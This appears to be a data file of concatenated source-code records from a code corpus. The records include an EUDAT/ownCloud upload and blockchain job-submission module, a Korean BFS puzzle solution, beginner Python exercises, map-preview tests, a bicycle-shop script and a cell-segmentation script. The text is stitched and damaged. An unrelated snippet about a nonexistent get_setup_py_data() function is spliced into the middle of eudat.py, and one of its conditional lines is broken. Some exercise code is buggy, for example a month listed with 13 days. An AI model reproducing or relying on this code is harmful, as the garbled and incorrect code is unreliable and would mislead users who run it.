\"--data-binary\",\n f\"@{output_file_name}\",\n f\"https://b2drop.eudat.eu/public.php/webdav/{output_file_name}\",\n \"-w\",\n \"%{http_code}\\n\"\n # \"-v\" # verbose\n ]\n\n # some arguments requires \"\" for curl to work\n cmd_temp = cmd.copy()\n cmd_temp[5] = f'\"{cmd[5]}\" \\ \\n '\n cmd_temp[7] = f'\"{cmd[7]}\" \\ \\n '\n cmd_temp[9] = f'\"{cmd[9]}\" \\ \\n '\n\n cmd_str = \" \".join(cmd_temp)\n log(f\"==> cmd:\\n{cmd_str}\\n\") # used for test purposes\n return popen_communicate(cmd)\n\n\ndef upload_results(encoded_share_token, output_file_name, path, attempt_count=1):\n \"\"\"Wrapper for the _upload_results() function.\"\"\"\n with cd(path):\n for _ in range(attempt_count):\n p, output, error = _upload_results(encoded_share_token, output_file_name)\n if error:\n log(error)\n\n if \"Warning: Couldn't read data from file\" in error:\n logging.error(\"E: EUDAT repository did not successfully uploaded\")\n return False\n\n if p.returncode != 0 or \" [{error}] {output}\")\n time.sleep(1) # wait 1 second for next step retry to upload\n else: # success on upload\n return True\n return False\n\n\ndef _login(fname, user, password_path):\n sleep_duration = 15\n config.oc = owncloud.Client(\"https://b2drop.eudat.eu/\")\n with open(password_path, \"r\") as content_file:\n password = content_file.read().strip()\n\n for _ in range(config.RECONNECT_ATTEMPTS):\n try:\n log(\"==> Trying to login into 
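get_setup_py_data() above runs a helper script with subprocess and parses its stdout as JSON. The same run-and-parse shape, reduced to something runnable on its own (the echoed payload is invented for the demo):

import json
import subprocess
import sys

result = subprocess.run(
    [sys.executable, "-c", "import json; print(json.dumps({'name': 'demo'}))"],
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE,
)
if result.stderr:
    print(result.stderr.decode(), file=sys.stderr)
data = json.loads(result.stdout.decode()) if result.stdout else None
print(data)  # {'name': 'demo'}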
owncloud \", end=\"\")\n config.oc.login(user, password) # May take long time to connect\n password = \"\"\n f = open(fname, \"wb\")\n pickle.dump(config.oc, f)\n f.close()\n log(\"[ ok ]\")\n except Exception:\n _traceback = traceback.format_exc()\n _colorize_traceback()\n if \"Errno 110\" in _traceback or \"Connection timed out\" in _traceback:\n logging.warning(f\"Sleeping for {sleep_duration} seconds to overcome the max retries that exceeded\")\n sleep_timer(sleep_duration)\n else:\n logging.error(\"E: Could not connect into Eudat\")\n terminate()\n else:\n return False\n logging.error(\"E: User is None object\")\n terminate()\n\n\ndef login(user, password_path, fname: str) -> None:\n if not user:\n logging.error(\"E: User is empty\")\n terminate()\n\n if os.path.isfile(fname):\n f = open(fname, \"rb\")\n config.oc = pickle.load(f)\n try:\n log(f\"## Login into owncloud from the dumped object={fname} \", end=\"\")\n config.oc.get_config()\n print_ok()\n except subprocess.CalledProcessError as e:\n logging.error(f\"FAILED. {e.output.decode('utf-8').strip()}\")\n _login(fname, user, password_path)\n else:\n _login(fname, user, password_path)\n\n\ndef share_single_folder(folder_name, f_id) -> bool:\n try:\n # folder_names = os.listdir('/oc')\n # fID = '5f0db7e4-3078-4988-8fa5-f066984a8a97@b2drop.eudat.eu'\n if not config.oc.is_shared(folder_name):\n config.oc.share_file_with_user(folder_name, f_id, remote_user=True, perms=31)\n print(\"* Sharing [ ok ]\")\n return True\n\n log(\"==> Requester folder is already shared\")\n return True\n except Exception:\n _colorize_traceback()\n return False\n\n\ndef initialize_folder(folder_to_share) -> str:\n dir_path = os.path.dirname(folder_to_share)\n tar_hash, tar_path = compress_folder(folder_to_share)\n tar_source = f\"{dir_path}/{tar_hash}.tar.gz\"\n try:\n config.oc.mkdir(tar_hash)\n except Exception as e:\n if \"405\" not in str(e):\n if not os.path.exists(f\"{env.OWNCLOUD_PATH}/{tar_hash}\"):\n try:\n os.makedirs(f\"{env.OWNCLOUD_PATH}/{tar_hash}\")\n except Exception as e:\n raise e\n else:\n log(\"==> Folder is already created\")\n else:\n log(\"==> Folder is already created\")\n\n tar_dst = f\"{tar_hash}/{tar_hash}.tar.gz\"\n\n try:\n config.oc.put_file(f\"./{tar_dst}\", tar_source)\n os.remove(tar_source)\n except Exception as e:\n if type(e).__name__ == \"HTTPResponseError\":\n try:\n shutil.copyfile(tar_source, f\"{env.OWNCLOUD_PATH}/{tar_dst}\")\n except Exception as e:\n raise e\n else:\n raise Exception(\"oc could not connected in order to upload the file\")\n\n return tar_hash\n\n\ndef get_size(f_name, oc=None) -> int:\n if oc is None:\n oc = config.oc\n return int(oc.file_info(f_name).attributes[\"{DAV:}getcontentlength\"])\n\n\ndef is_oc_mounted() -> bool:\n mount_path = \"/oc\"\n output = None\n try:\n output = run([\"findmnt\", \"--noheadings\", \"-lo\", \"source\", mount_path])\n except:\n return False\n\n if \"b2drop.eudat.eu/remote.php/webdav/\" not in output:\n print(\n \"Mount a folder in order to access EUDAT(https://b2drop.eudat.eu/remote.php/webdav/).\\n\"\n \"Please do: \\n\"\n \"mkdir -p /oc \\n\"\n \"sudo mount.davfs https://b2drop.eudat.eu/remote.php/webdav/ /oc\"\n )\n return False\n else:\n return True\n\n\ndef submit(provider, account_id, folders_to_share):\n try:\n tx_hash = _submit(provider, account_id, folders_to_share)\n receipt = get_tx_status(tx_hash)\n if receipt[\"status\"] == 1:\n logs = config.ebb.events.LogJob().processReceipt(receipt, errors=DISCARD)\n pprint(vars(logs[0].args))\n try:\n log(f\"job's 
index={logs[0].args['index']}\")\n log(\"SUCCESS\")\n except IndexError:\n log(\"E: Transaction is reverted\")\n except Exception:\n _colorize_traceback()\n sys.exit(1)\n\n\ndef _submit(provider, account_id, folders_to_share):\n job = Job()\n requester = config.w3.toChecksumAddress(config.w3.eth.accounts[account_id])\n job.Ebb.is_requester_valid(requester)\n job.Ebb.is_eth_account_locked(requester)\n\n provider = config.w3.toChecksumAddress(provider)\n provider_info = job.Ebb.get_provider_info(provider)\n print(f\"provider[fID]={str(provider_info['f_id'])}\")\n\n job.folders_to_share = folders_to_share.copy()\n\n try:\n git.is_repo(job.folders_to_share)\n except:\n _colorize_traceback()\n sys.exit(1)\n\n log(\"\")\n for idx, folder in enumerate(job.folders_to_share):\n if idx != 0:\n print(\"\")\n\n log(f\"==> folder_to_share={folder}\", color=\"green\")\n try:\n git.initialize_check(folder)\n git.commit_changes(folder)\n folder_hash = initialize_folder(folder)\n except:\n _colorize_traceback()\n sys.exit(1)\n\n if idx == 0:\n job_key = folder_hash\n\n # required to send string as bytes\n job.source_code_hashes.append(config.w3.toBytes(text=folder_hash))\n if not share_single_folder(folder_hash, provider_info[\"f_id\"]):\n sys.exit(1)\n\n time.sleep(0.25)\n\n log(\"\")\n log(\"==> Submitting the job\")\n job.run_time = [60] # in seconds\n job.cores = [1]\n job.data_transfer_ins = [1, 116]\n job.dataTransferOut = 1\n\n job.storage_ids = [StorageID.EUDAT, StorageID.EUDAT]\n job.cache_types = [CacheType.PRIVATE, CacheType.PUBLIC]\n job.storage_hours = [1, 1]\n job.data_prices_set_block_numbers = [0, 0]\n print(job.source_code_hashes)\n job_price, _cost = cost(provider, requester, job)\n try:\n return job.Ebb.submit_job(provider, job_key, account_id, job_price, job)\n except Exception as e:\n _colorize_traceback()\n if type(e).__name__ == \"QuietExit\":\n log(f\"E: Unlock your Ethereum Account(web3.eth.accounts[{account_id}])\", color=\"red\")\n log(\"In order to unlock an account you can use: ~/eBlocPOA/client.sh\", color=\"yellow\")\n sys.exit(1)\n","sub_path":"broker/libs/eudat.py","file_name":"eudat.py","file_ext":"py","file_size_in_byte":9860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"300491357","text":"# 아기상어\n\nfrom collections import deque\n\ndxs = [-1, 0, 0, 1]\ndys = [0, -1, 1, 0]\n\ndef bfs(x, y):\n q, visited = deque([(x, y)]), set([(x, y)])\n time = 0\n shark = 2 # 현재 아기 상어의 크기다.\n eat = 0 # 현재 크기에서, 지금까지 먹은 물고기 수다.\n eat_flag = False # 현재 상태에서 물고기를 먹은 경우,\n # for _ in range(size) 구문을 진행하지 않기 위한 플래그다.\n answer = 0\n\n while q:\n size = len(q)\n\n # 위, 그리고 왼쪽을 더 우선시해서 가야하기 때문에, BFS queue를 소팅해준다.\n q = deque(sorted(q))\n for _ in range(size):\n x, y = q.popleft()\n\n # 현재 위치에 아기 상어보다 작은 물고기가 있어서, 이를 먹은 경우.\n if board[x][y] != 0 and board[x][y] < shark:\n board[x][y] = 0\n eat += 1\n\n # 아기 상어의 크기 만큼 먹었다면, 아기 상어의 크기를 +1 해줘야한다.\n if eat == shark:\n shark += 1\n eat = 0\n\n # 먹고 난 뒤, 현재 위치를 기준으로 다시 근처를 탐색해야 하기 때문에,\n # BFS queue 와 visited 를 초기화 해준다.\n q, visited = deque(), set([(x, y)])\n eat_flag = True\n\n # 먹었을 때의 시간을 저장해둔다.\n answer = time\n\n for dx, dy in zip(dxs, dys):\n nx, ny = x + dx, y + dy\n if nx >= 0 and nx < n and ny >= 0 and ny < n and (nx, ny) not in visited:\n if board[nx][ny] <= shark:\n q.append((nx, ny))\n visited.add((nx, ny))\n\n # 현재 위치에서 먹었다면, 더 이상 위 반복문을 돌 필요가 없다.\n if eat_flag:\n eat_flag = False\n break\n\n time += 1\n return answer\n\nn = int(input())\nboard = [list(map(int , input().split())) 
for _ in range(n)]\n\n# 1. 초기 상어(자신)의 위치를 파악하고, 해당 자리는 판에서 비워둔다.\ns_x, s_y = None, None\nfor i in range(n):\n for j in range(n):\n if board[i][j] == 9:\n s_x, s_y = i, j\n board[i][j] = 0\n\n# 2. 시작점에서 BFS 진행\nprint(bfs(s_x, s_y))","sub_path":"class3/16236.py","file_name":"16236.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"305514005","text":"from random import randint\nfrom src.median import median, sort_and_pick_median\nfrom src import runtime\n\n\ndef test_runtime():\n print('\\ntest_median_runtime')\n args = []\n for exp in range(2, 7):\n size = 10 ** exp\n args.append([randint(-1000, 1000) for _ in range(size)])\n\n runtime(median, args=args, format_lines=_format_lines)\n assert(args == args)\n runtime(sort_and_pick_median, args=args, format_lines=_format_lines)\n\n\ndef _format_lines(times, average_time, max_time, min_time, input_values,\n output_values, func_name, include_header=True):\n \"\"\"Generator to format each line that gets saved in comma separated value\n file given the input, output, and runtime data of some function.\n \"\"\"\n # headers for rows of values\n if include_header:\n yield 'call number, {} runtime, inp, out,' \\\n ' min_time, max_time, average_time\\n'.format(func_name)\n yield '1, {}, {}, {}, {}, {}, {}\\n'\\\n .format(times[0], len(input_values[0]), output_values[0],\n min_time, max_time, average_time)\n\n count = 2\n for time, in_value, out_value \\\n in zip(times[1:], input_values[1:], output_values[1:]):\n yield '{}, {}, {}, {}\\n'\\\n .format(count, time, len(in_value), out_value)\n count += 1\n\n\nif __name__ == '__main__':\n test_runtime()\n","sub_path":"src/median/tests/test_runtime.py","file_name":"test_runtime.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"308042975","text":"import os, yaml, logging, logging.config, codecs\nfrom google.auth import environment_vars\n\n# recommendation engine service bucket path\n\nHQ_BUCKET = 'gs://recomm-job'\n\nDATA = 'data'\nMODEL = 'model'\nLOG = 'log'\n\nTRAIN_FNAME = 'data.tr'\nVALID_FNAME = 'data.vl'\n\nERR_CDE = 'err_cde'\nERR_MSG = 'err_msg'\n\n# For local use! 
Not on GCE\nCREDENTIAL_NAME = environment_vars.CREDENTIALS\nos.environ[CREDENTIAL_NAME] = 'D:/Python/notebook/restful/auth.json'\nLOCAL_REPO = 'D:/Python/notebook/restful/repo'\n\n\nPROJECT_ID = 'training-recommendation-engine'\nPROJECT_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nclass Logging(object):\n instance = None\n sd_handler = None\n\n @staticmethod\n def logger(name):\n if Logging.instance is None:\n with codecs.open(os.path.join(os.path.dirname(__file__), 'logging.yaml'), 'r', 'utf-8') as r:\n logging.config.dictConfig(yaml.load(r))\n Logging.instance = logging\n\n logger_ = Logging.instance.getLogger(name)\n # # stack driver client\n # if Logging.sd_handler is None and os.environ.get(CREDENTIAL_NAME) is not None:\n # from google.cloud import logging as sd_logging\n # Logging.sd_handler = sd_logging.Client().get_default_handler()\n #\n # # see if exists stack driver handler\n # if Logging.sd_handler is not None:\n # logger_.addHandler(Logging.sd_handler)\n return logger_\n\n# short path of Logging.logger\ndef logger(name):\n return Logging.logger(name)\n\nclass APIClient:\n storage_client = None\n\ndef remove_cred_envars():\n if CREDENTIAL_NAME in os.environ:\n del os.environ[CREDENTIAL_NAME]\n\ndef bucket(bucket_name):\n if APIClient.storage_client is None:\n from google.cloud import storage\n APIClient.storage_client = storage.Client()\n return APIClient.storage_client.get_bucket(bucket_name)\n\n","sub_path":"recomm/trainer/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"81238861","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^login/$', views.login, name='login'),\n url(r'^dashboard/$', views.dashboard, name='dashboard'),\n url(r'^blogs/$', views.blogs, name='blogs_index'),\n url(r'^blogs/new/$', views.blogs_new, name='blogs_new'),\n url(r'^blogs/(?P[0-9]+)/edit/$', views.blogs_edit, name='blogs_edit'), \n]","sub_path":"admin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"645259870","text":"\n# 문제 1 : 리스트에 저장된 문자열의 갯수를 다시 리스트에 담기\n\ndef solution(shirt_size) : # 함수 만들기\n # 지문 보고 문제 풀기~~~\n size_count = [0, 0, 0, 0, 0, 0]\n\n for ss in shirt_size : # 리스트 반복 => 리스트내 항목이 변수에 하나씩 대입\n if ss == \"XS\":\n size_count[0] += 1\n if ss == \"S\":\n size_count[1] +=1\n if ss == \"M\":\n size_count[2] +=1\n if ss == \"L\":\n size_count[3] +=1\n if ss == \"XL\":\n size_count[4] +=1\n if ss == \"XXL\":\n size_count[5] +=1\n return size_count\n answer = [ ] # 리스트\n return answer # 함수가 끝나면서 돌려주는 값 => return => 리스트를 리턴\n\nshirt_size = [\"XS\", \"S\",\"M\", \"L\", \"XL\", \"S\"]\nret = solution(shirt_size) # 함수 불러내기\n\nprint(\"solution : return value of the function\", ret, \" .\")\n\n# 문제 2\n\ndef solution(price, grade):\n answer = 0\n\n if grade == \"S\":\n answer = price*0.95\n if grade == \"G\":\n answer = price*0.9\n if grade == \"V\":\n answer = price * 0.85\n\n return int(answer)\n\nprice1 = 2500\ngrade1 = \"V\"\nret1 = solution(price1, grade1)\n\nprint(\"Solution: return value of the function in\", ret1, \".\")\n\nprice2 = 96900\ngrade2 = \"0\"\nret2 = solution(price2, grade2)\n\nprint(\"Solution: return value of the function in\", ret2, \".\")\n\n# 문제 3\n\ndef func_a(month, day):\n month_list = [31, 28, 31, 30, 31, 30, 13, 31, 30, 31, 30, 31]\n total = 0;\n for i in 
range(month-1):\n total += month_list[i]\n total += day\n return total -1\n\ndef solution(start_month, start_day, end_month, end_day):\n start_total = func_a(start_month, start_day)\n end_total = func_a(end_month, end_day)\n return end_total - start_total\n\nstart_month = 1\nstart_day = 2\nend_month = 2\nend_day = 2\nret = solution(start_month, start_day, end_month, end_day)\n\nprint(\"Solution: return value of the function is\", ret, \".\")\n\n# 문제 4\n\ndef func_a(arr):\n counter = [0 for _ in range(1001)]\n for x in arr:\n counter[x] += 1\n return counter\n\ndef func_b(arr):\n ret = 0\n for x in arr:\n if ret < x:\n ret = x\n return ret\n\ndef func_c(arr):\n INF = 1001\n ret = INF\n for x in arr:\n if x != 0 and ret > x:\n ret = x\n return ret\n\ndef solution(arr):\n counter =func_c(arr)\n max_cnt = func_b(counter)\n min_cnt = func_c(counter)\n return max_cnt // min_cnt\n\narr = [1, 2, 3, 3, 1, 3, 3, 2, 3, 2]\nret = solution(arr)\n\nprint(\"Solution : return value of the function is\", ret, \".\")\n\n# 문제 5\ndef solution(arr):\n left, right = 0, len(arr)-1\n while left < right:\n arr[left], arr[right] = arr[right], arr[left]\n left += 1\n right-= 1\n return arr\n\n # left가 0일 경우 right도 0 => 반복문 실행\n # arr[0], arr[0] = arr[0], arr[0]\n #1 #1 #1 #1\n #left + 1 right-1\n #left 1일경우 right -1\n #arr[1], arr[-1] = arr[-1], arr[1]\n #4 #3 #3 #4\n # left +1 right-1\n # left 2일경우 right -2\n # arr[2], arr[-2] = arr[-2], arr[2]\narr = [1, 4, 2, 3]\nret = solution(arr)\n\nprint(\"Solution: return value of the function is\", ret, \".\")\n\n# 문제 6\ndef solution(number):\n count = 0\n for i in range(1, number+1):\n current = i\n temp = count\n while current != 0:\n if current %10 == 3 or current %10 == 6 or current % 10 == 9:\n count += 1\n print(\"pair\", end = '')\n current = current // 10\n if temp == count:\n print(i, end = '')\n print(\" \", end = '')\n print(\"\")\n return count","sub_path":"파이썬 입시/COS PRO_2/문제.py","file_name":"문제.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"550202425","text":"# -*- coding: utf-8 -*-\n\"\"\" Created by Mevlana Ayas on 22/07/2017 \"\"\"\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom teamroles.models.mixins import TimeStampMixin\n\n__author__ = 'mevlanaayas'\n\n\nclass Role(TimeStampMixin):\n name = models.CharField(_('Role Name'), db_column='name', max_length=200, unique=True)\n status = models.BooleanField(default=True)\n next_role = models.ForeignKey('self',\n verbose_name=_('Next Role'),\n db_column='next_role',\n related_name='next_step',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n default=None)\n previous_role = models.ForeignKey('self',\n verbose_name=_('Previous Role'),\n db_column='previous_role',\n related_name='previous_step',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n default=None)\n\n class Meta:\n verbose_name = _('Role')\n verbose_name_plural = _('Roles')\n db_table = 'django_teams_role'\n app_label = 'teamroles'\n\n def __unicode__(self):\n return self.name\n\n def __str__(self):\n return self.name\n\n\nclass AbstractRole(TimeStampMixin):\n name = models.CharField(_('Role Name'), db_column='name', max_length=200, unique=True)\n status = models.BooleanField(default=True)\n\n class Meta:\n abstract = 
True\n","sub_path":"teamroles/models/role.py","file_name":"role.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"100079249","text":"from __future__ import division\n\nimport os\nimport unittest\nimport tempfile\nimport subprocess\n\nfrom os.path import join, dirname\nfrom zipfile import ZipFile\nfrom shutil import rmtree\n\nfrom httmock import HTTMock, response\n\nfrom .. import preview\n\nclass TestPreview (unittest.TestCase):\n\n def setUp(self):\n self.temp_dir = tempfile.mkdtemp(prefix='TestPreview-')\n\n def tearDown(self):\n rmtree(self.temp_dir)\n\n def test_stats(self):\n points = [(n, n) for n in range(-1000, 1001)]\n points_filename = join(self.temp_dir, 'points.bin')\n preview.write_points(points, points_filename)\n\n xmean, xsdev, ymean, ysdev = preview.stats(points_filename)\n self.assertAlmostEqual(xmean, 0)\n self.assertAlmostEqual(xsdev, 577.783263863)\n self.assertAlmostEqual(ymean, xmean)\n self.assertAlmostEqual(ysdev, xsdev)\n\n def test_calculate_bounds(self):\n points = [(-10000, -10000), (10000, 10000)]\n points += [(-1, -1), (0, 0), (1, 1)] * 100\n points_filename = join(self.temp_dir, 'points.bin')\n preview.write_points(points, points_filename)\n\n bbox = preview.calculate_bounds(points_filename)\n self.assertEqual(bbox, (-1.04, -1.04, 1.04, 1.04), 'The two outliers are ignored')\n\n def test_render_zip(self):\n '''\n '''\n def response_content(url, request):\n if url.hostname == 'a.tiles.mapbox.com' and url.path.startswith('/v4/mapbox.mapbox-streets-v7'):\n if 'access_token=mapbox-XXXX' not in url.query:\n raise ValueError('Missing or wrong API key')\n data = b'\\x1a\\'x\\x02\\n\\x05water(\\x80 \\x12\\x19\\x18\\x03\"\\x13\\t\\xe0\\x7f\\xff\\x1f\\x1a\\x00\\xe0\\x9f\\x01\\xdf\\x9f\\x01\\x00\\x00\\xdf\\x9f\\x01\\x0f\\x08\\x00'\n return response(200, data, headers={'Content-Type': 'application/vnd.mapbox-vector-tile'})\n raise Exception(\"Uknown URL\")\n\n zip_filename = join(dirname(__file__), 'outputs', 'alameda.zip')\n handle, png_filename = tempfile.mkstemp(prefix='render-', suffix='.png')\n os.close(handle)\n\n try:\n with HTTMock(response_content):\n preview.render(zip_filename, png_filename, 668, 1, 'mapbox-XXXX')\n info = str(subprocess.check_output(('file', png_filename)))\n\n self.assertTrue('PNG image data' in info)\n self.assertTrue('668 x 573' in info)\n self.assertTrue('8-bit/color RGB' in info)\n finally:\n os.remove(png_filename)\n\n def test_render_csv(self):\n '''\n '''\n def response_content(url, request):\n if url.hostname == 'a.tiles.mapbox.com' and url.path.startswith('/v4/mapbox.mapbox-streets-v7'):\n if 'access_token=mapbox-XXXX' not in url.query:\n raise ValueError('Missing or wrong API key')\n data = b'\\x1a\\'x\\x02\\n\\x05water(\\x80 \\x12\\x19\\x18\\x03\"\\x13\\t\\xe0\\x7f\\xff\\x1f\\x1a\\x00\\xe0\\x9f\\x01\\xdf\\x9f\\x01\\x00\\x00\\xdf\\x9f\\x01\\x0f\\x08\\x00'\n return response(200, data, headers={'Content-Type': 'application/vnd.mapbox-vector-tile'})\n raise Exception(\"Uknown URL\")\n\n zip_filename = join(dirname(__file__), 'outputs', 'portland_metro.zip')\n handle, png_filename = tempfile.mkstemp(prefix='render-', suffix='.png')\n os.close(handle)\n\n try:\n temp_dir = tempfile.mkdtemp(prefix='test_render_csv-')\n zipfile = ZipFile(zip_filename)\n\n with open(join(temp_dir, 'portland.csv'), 'wb') as file:\n file.write(zipfile.read('portland_metro/us/or/portland_metro.csv'))\n csv_filename = file.name\n\n with 
HTTMock(response_content):\n preview.render(csv_filename, png_filename, 668, 1, 'mapbox-XXXX')\n info = str(subprocess.check_output(('file', png_filename)))\n\n self.assertTrue('PNG image data' in info)\n self.assertTrue('668 x 289' in info)\n self.assertTrue('8-bit/color RGB' in info)\n finally:\n os.remove(png_filename)\n os.remove(csv_filename)\n os.rmdir(temp_dir)\n\n def test_get_map_features(self):\n '''\n '''\n def response_content(url, request):\n if url.hostname == 'a.tiles.mapbox.com' and url.path.startswith('/v4/mapbox.mapbox-streets-v7'):\n if 'access_token=mapbox-XXXX' not in url.query:\n raise ValueError('Missing or wrong API key')\n with open(join(dirname(__file__), 'data', 'mapbox-tile.mvt'), 'rb') as file:\n data = file.read()\n return response(200, data, headers={'Content-Type': 'application/vnd.mapbox-vector-tile'})\n raise Exception(\"Uknown URL\")\n\n xmin, ymin, xmax, ymax = -13611952, 4551290, -13609564, 4553048\n scale = 100 / (xmax - xmin)\n\n with HTTMock(response_content):\n landuse_geoms, water_geoms, roads_geoms = \\\n preview.get_map_features(xmin, ymin, xmax, ymax, 2, scale, 'mapbox-XXXX')\n\n self.assertEqual(len(landuse_geoms), 90, 'Should have 90 landuse geometries')\n self.assertEqual(len(water_geoms), 1, 'Should have 1 water geometry')\n self.assertEqual(len(roads_geoms), 792, 'Should have 792 road geometries')\n\n\n","sub_path":"openaddr/tests/preview.py","file_name":"preview.py","file_ext":"py","file_size_in_byte":5328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"24588516","text":"#!/usr/bin/python3\n#\n# A main script to run bicycle.py\n#\n# Author: Francis Kessie\n#\nimport bicycle as bi\nimport random\n\n#create 6 diferent models of bicycles and add names, weight and cost to produce\nbikemodel1 = bi.Bicycle(\"Vampire\", 600, 15.2) \nbikemodel2 = bi.Bicycle(\"Climber\", 250, 16.5)\nbikemodel3 = bi.Bicycle(\"Venus\", 520, 16.5)\nbikemodel4 = bi.Bicycle(\"Jasper\", 150, 16.0)\nbikemodel5 = bi.Bicycle(\"Vanti\", 145, 17.0)\nbikemodel6 = bi.Bicycle(\"Jumper\", 400, 17.5)\n\n\n#Create a bicycle shop that has 6 different bicycle models in store\nbikeshop1 = bi.BikeShop(\"Speed Cyclers Coporation\")\nbikeshop1.add_bikes(bikemodel1)\nbikeshop1.add_bikes(bikemodel2)\nbikeshop1.add_bikes(bikemodel3)\nbikeshop1.add_bikes(bikemodel4)\nbikeshop1.add_bikes(bikemodel5)\nbikeshop1.add_bikes(bikemodel6)\n\n#print initial inventory, inventory is only cost to produce items\ninventory = bikeshop1.inventory\n\nprint(\"Initial inventory is ....\")\nfor model in inventory:\n print(\"{0:<8}: ${1}\".format(model.modelname, model.prodcost))\n\n \n#print initial stocks of bikes in shop and corresponding selling prices\npftmrg = 1.2 #profit margin set to 20%\nstocks = {}\nprint() \nprint(\"Selling prices are...\")\nfor model in inventory: \n stocks[model.modelname] = float(model.prodcost)*pftmrg \n print(\"{0:<8}: ${1}\".format(model.modelname, float(model.prodcost)*pftmrg)) \n\n\n#Create three customers. One customer has a budget of $200, the second $500, \n#and the third $1000. 
\ncustomer1 = bi.Customers(\"James Walker\", 200)\ncustomer2 = bi.Customers(\"Greg Parsons\", 500)\ncustomer3 = bi.Customers(\"Joe Blogger\", 1000)\n\n\n#Print the name of each customer, and a list of the bikes offered by the bike \n#shop that they can afford given their budget.\nprint()\nfor customer in [customer1,customer2, customer3]: \n print()\n print(\"With\", \"$\"+str(customer.bikefund),customer.customername,\"can afford.\") \n for model in inventory: \n if customer.bikefund >= float(model.prodcost)*1.2:\n print(\"{0:<8}: ${1}\".format(model.modelname, model.prodcost)) \n \n#Have each of the three customers purchase a bike then print the name \n#of the bike the customer purchased, the cost, and how much\n#money they have left over in their bicycle fund \nprint()\npurchasedbikes =[]\nfor cust in [customer1, customer2, customer3]:\n buys =[] \n print()\n for model in inventory: \n if cust.bikefund >= float(model.prodcost)*1.2:\n buys.append(model.modelname)\n pick=random.choice(buys)\n purchasedbikes.append(pick) \n print(cust.customername, \"bought...\")\n print(\"A {0} for ${1}\".format(pick,stocks[pick])) \n for model in inventory:\n if model.modelname == pick:\n inventory.remove(model)\n\n\n#print how much profit the shop has made selling the three bikes.\nprofit =[]\nfor bike, price in stocks.items():\n if bike in purchasedbikes:\n profit.append(price - price/pftmrg)\nprint()\nprint(\"{0} has made a profit of ${1}\".format(bikeshop1.shopname,sum(profit)))\n \n#print new inventory, inventory is only cost to produce items\nprint()\nprint(\"Items remaining in store for sale store are...\")\nfor model in inventory:\n print(\"A {0:<8}: ${1}\".format(model.modelname, stocks[model.modelname]))\n\n\n\n","sub_path":"bicycle_industry/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"202414410","text":"import h5py\nimport tifffile as tiff\nfrom keras.backend.common import _UID_PREFIXES\n\nfrom cnn_functions import nikon_getfiles, get_image, run_models_on_directory, get_image_sizes, segment_nuclei, segment_cytoplasm, dice_jaccard_indices\nfrom model_zoo import sparse_bn_feature_net_61x61 as cyto_fn\nfrom model_zoo import sparse_bn_feature_net_61x61 as nuclear_fn\n\nimport os\nimport numpy as np\n\ndirec_name = '/home/ubuntu/DeepCell/validation_data/HeLa/'\ndata_location = os.path.join(direc_name, 'RawImages')\n\ncyto_location = os.path.join(direc_name, 'Cytoplasm')\nnuclear_location = os.path.join(direc_name, 'Nuclear')\nmask_location = os.path.join(direc_name, 'Masks')\n\ncyto_channel_names = ['phase', 'farred']\nnuclear_channel_names = ['farred']\n\ntrained_network_cyto_directory = \"/home/ubuntu/DeepCell/trained_networks/HeLa/\"\ntrained_network_nuclear_directory = \"/home/ubuntu/DeepCell/trained_networks/Nuclear/\"\n\ncyto_prefix = \"2017-06-21_HeLa_all_61x61_bn_feature_net_61x61_\"\nnuclear_prefix = \"2016-07-12_nuclei_all_61x61_bn_feature_net_61x61_\"\n\nwin_cyto = 30\nwin_nuclear = 30\n\nimage_size_x, image_size_y = get_image_sizes(data_location, nuclear_channel_names)\nimage_size_x /= 2\nimage_size_y /= 2\n\nlist_of_cyto_weights = []\nfor j in xrange(5):\n\tcyto_weights = os.path.join(trained_network_cyto_directory, cyto_prefix + str(j) + \".h5\")\n\tlist_of_cyto_weights += [cyto_weights]\n\nlist_of_nuclear_weights = []\nfor j in xrange(5):\n\tnuclear_weights = os.path.join(trained_network_nuclear_directory, nuclear_prefix + str(j) + 
\".h5\")\n\tlist_of_nuclear_weights += [nuclear_weights]\n\ncytoplasm_predictions = run_models_on_directory(data_location, cyto_channel_names, cyto_location, model_fn = cyto_fn, \n\tlist_of_weights = list_of_cyto_weights, image_size_x = image_size_x, image_size_y = image_size_y, \n\twin_x = win_cyto, win_y = win_cyto, std = False, split = False)\n\nnuclear_predictions = run_models_on_directory(data_location, nuclear_channel_names, nuclear_location, model_fn = nuclear_fn, \n\tlist_of_weights = list_of_nuclear_weights, image_size_x = image_size_x, image_size_y = image_size_y, \n\twin_x = win_nuclear, win_y = win_nuclear, std = False, split = False)\n\nnuclear_masks = segment_nuclei(nuclear_predictions, mask_location = mask_location, threshold = 0.75, area_threshold = 100, solidity_threshold = 0.75, eccentricity_threshold = 0.95)\ncytoplasm_masks = segment_cytoplasm(cytoplasm_predictions, nuclear_masks = nuclear_masks, mask_location = mask_location, smoothing = 1, num_iters = 120)\n\ndirec_val = os.path.join(direc_name, 'Validation')\nimglist_val = nikon_getfiles(direc_val, 'validation_interior')\n\nval_name = os.path.join(direc_val, imglist_val[0]) \nval = get_image(val_name)\nval = 